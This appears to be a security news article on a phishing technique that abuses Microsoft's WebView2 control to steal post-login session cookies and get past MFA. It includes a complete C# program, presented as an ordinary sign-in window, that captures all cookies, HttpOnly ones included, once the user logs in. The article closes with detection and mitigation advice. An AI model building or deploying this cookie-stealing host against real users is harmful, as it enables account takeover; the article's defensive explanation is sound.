A security researcher recently published a phishing technique that abuses Microsoft's WebView2 control. Because it captures the session cookies a site issues after login, it bypasses multi-factor authentication (MFA) and poses a severe risk to enterprise and individual users.
New phishing attack uses Microsoft WebView2 to bypass MFA
A security researcher has shown how an application built on Microsoft Edge's WebView2 control can capture a target's authentication cookies, letting an attacker bypass multi-factor authentication (MFA) and log in to the victim's accounts.
Amid database breaches, malware-based credential leakage, and phishing campaigns, stolen user credentials are abundant online. Enterprises and individual users have adopted multi-factor authentication (MFA) to add a layer of security to the authentication process. This technique sidesteps that layer: rather than attacking one-time codes or security keys, it captures the session cookie the site issues after the victim has already completed MFA.
Ethical hacker Mr.D0x is behind the release of this WebView2 technique, which abuses legitimate WebView2 functionality rather than a vulnerability in the control. He also developed the Browser-in-the-Browser (BitB) attack method earlier this year.
How does a Microsoft WebView2 attack bypass MFA?
The researcher stated, "WebView2 also provides built-in functionality to extract cookies. It allows an attacker to extract cookies after the user authenticates into a legitimate website. This technique removes the need to spin up Evilginx2 or Modlishka, but the obvious trade-off is that the user must execute the binary and authenticate."
In practice the attacker's application uses the built-in WebView2 "ICoreWebView2CookieManager" interface to export the cookies of the successfully authenticated session; those cookies can then be imported into the attacker's own browser with a simple Chrome extension such as "EditThisCookie" to resume the victim's session. The alarming aspect is that this bypasses MFA completely, whatever factor is in use: one-time passwords and security keys still work as designed during login, but the cookies are taken only after the user has logged in, so it is the authenticated session, not the second factor, that is stolen.
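The following is an added example written for this page, not Mr.D0x's published proof of concept: a minimal C# WinForms host that embeds WebView2, lets the user log in (MFA included) inside the control, and then dumps the resulting cookies through the CookieManager API described above. The login URL, the profile folder path and the "navigated away from the login page" heuristic are assumptions for illustration; it needs the Microsoft.Web.WebView2 NuGet package and the WebView2 Runtime installed.

```csharp
// Added example, not the researcher's code: a WebView2 host that dumps
// the cookies of whatever session the user establishes inside it.
// Assumptions: LoginUrl is a placeholder; the profile folder is arbitrary;
// "left the login page" is used as the signal that authentication finished.
using System;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Web.WebView2.Core;
using Microsoft.Web.WebView2.WinForms;

public class CookieDumpForm : Form
{
    // Assumption: any site that issues a session cookie after login works here.
    private const string LoginUrl = "https://login.example.com/";
    private readonly WebView2 _webView = new WebView2 { Dock = DockStyle.Fill };

    public CookieDumpForm()
    {
        Text = "Sign in";            // what the user sees: an ordinary login window
        Width = 900; Height = 700;
        Controls.Add(_webView);
        Load += async (_, __) => await InitAsync();
    }

    private async Task InitAsync()
    {
        // A fresh user-data folder forces a full login, so every cookie collected
        // afterwards belongs to a session that has already passed MFA.
        var env = await CoreWebView2Environment.CreateAsync(null, @"C:\Temp\wv2-profile");
        await _webView.EnsureCoreWebView2Async(env);

        _webView.CoreWebView2.NavigationCompleted += OnNavigationCompleted;
        _webView.CoreWebView2.Navigate(LoginUrl);
    }

    private async void OnNavigationCompleted(object sender, CoreWebView2NavigationCompletedEventArgs e)
    {
        if (!e.IsSuccess) return;

        // Heuristic: the login flow is over once we land somewhere other than the login page.
        string current = _webView.CoreWebView2.Source;
        if (current.StartsWith(LoginUrl, StringComparison.OrdinalIgnoreCase)) return;

        await DumpCookiesAsync();
    }

    private async Task DumpCookiesAsync()
    {
        // The host process, not page JavaScript, asks for the cookies, so HttpOnly
        // cookies come back as well. A null URI returns every cookie in the profile.
        var cookies = await _webView.CoreWebView2.CookieManager.GetCookiesAsync(null);
        foreach (CoreWebView2Cookie c in cookies)
        {
            Console.WriteLine($"{c.Domain}\t{c.Path}\t{c.Name}={c.Value}\t" +
                              $"HttpOnly={c.IsHttpOnly}\tSecure={c.IsSecure}\tExpires={c.Expires:u}");
        }
    }

    [STAThread]
    public static void Main()
    {
        Application.EnableVisualStyles();
        Application.Run(new CookieDumpForm());
    }
}
```

Build it as a console application with `UseWindowsForms` enabled so the dump lands in the terminal rather than being discarded. Two points a defender should take from it: the HttpOnly flag offers no protection because the request is made by the host process rather than by script running in the page, and nothing here touches the site's MFA logic, which is why the kind of second factor is irrelevant. On the endpoint, the WebView2 Runtime runs as msedgewebview2.exe child processes of the host executable, so an unfamiliar binary parenting msedgewebview2.exe is a useful hunting lead.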
Erich Kron, security awareness promoter at security awareness training company KnowBe4 Inc., stated, "Other precautions must be taken to secure accounts and protect organizations against attack." He further explained that the attack depends on luring the victim into a dangerous activity, and that a single program downloaded from the internet is all it takes to start it.
Two of the countermeasures that first come to mind do not actually address this threat. Abandoning Microsoft Edge or applications built on WebView2 does not help, because the attacker's executable brings the WebView2 runtime with it and the victim's regular browser is never involved. Replacing one-time passcodes and security keys with biometric authentication does not help either: the cookies are taken after authentication completes, whichever factor was used. The weak point is the one the researcher himself named, namely that the victim has to download and execute the binary. Application control that only allows approved executables, blocking unsigned programs delivered by e-mail or download, and awareness training around unsolicited installers all stop the attack at that step.
Enterprises should additionally leverage modern authentication measures such as risk-based authentication (RBA) or adaptive authentication, which can flag a session cookie being replayed from an unknown device or location, and keep session lifetimes short so that a stolen cookie expires before it is worth much.
In short, treat this as a malware-delivery problem first: keep untrusted executables from running, then use adaptive authentication and short-lived sessions to limit what a stolen cookie can do.